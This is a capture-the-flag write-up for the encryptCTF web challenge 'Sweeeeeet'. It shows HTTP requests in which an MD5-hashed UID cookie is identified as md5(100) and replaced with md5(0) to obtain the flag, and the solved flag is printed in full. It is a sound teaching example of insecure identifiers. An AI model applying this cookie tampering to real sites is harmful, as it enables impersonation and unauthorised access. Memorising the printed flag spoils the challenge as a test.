Tags: cookie web
Rating:
# ▼▼▼Sweeeeeet(Web:50、174/696=25%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
```
Do you like sweets?
http://104.154.106.182:8080
author: codacker
```
---
## 【Check】
```
GET / HTTP/1.1
Host: 104.154.106.182:8080
```
↓
```
HTTP/1.1 200 OK
Date: Thu, 04 Apr 2019 12:30:21 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.3.3
Set-Cookie: UID=f899139df5e1059396431415e770c6dd; expires=Sat, 06-Apr-2019 12:30:21 GMT; Max-Age=172800
Vary: Accept-Encoding
Content-Length: 353
Connection: close
Content-Type: text/html; charset=UTF-8
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Hidden</title>
</head>
<body>
<h2>Hey You, yes you!
are you looking for a flag, well it's not here bruh!
Try someplace else<h2>
</body>
</html>
```
---
Only here is suspicious.Seems to be MD5
`Set-Cookie: UID=f899139df5e1059396431415e770c6dd`
↓ Google search
md5(100)=f899139df5e1059396431415e770c6dd
---
## 【exploit】
Try to send MD5 from `0` to `101`
↓
Only the following response was different
md5(0)=`cfcd208495d565ef66e7dff9f98764da`
↓
```
GET / HTTP/1.1
Host: 104.154.106.182:8080
Cookie: UID=cfcd208495d565ef66e7dff9f98764da
```
↓
`Set-Cookie: FLAG=encryptCTF%7B4lwa4y5_Ch3ck_7h3_c00ki3s%7D%0A`
↓
`encryptCTF{4lwa4y5_Ch3ck_7h3_c00ki3s}`
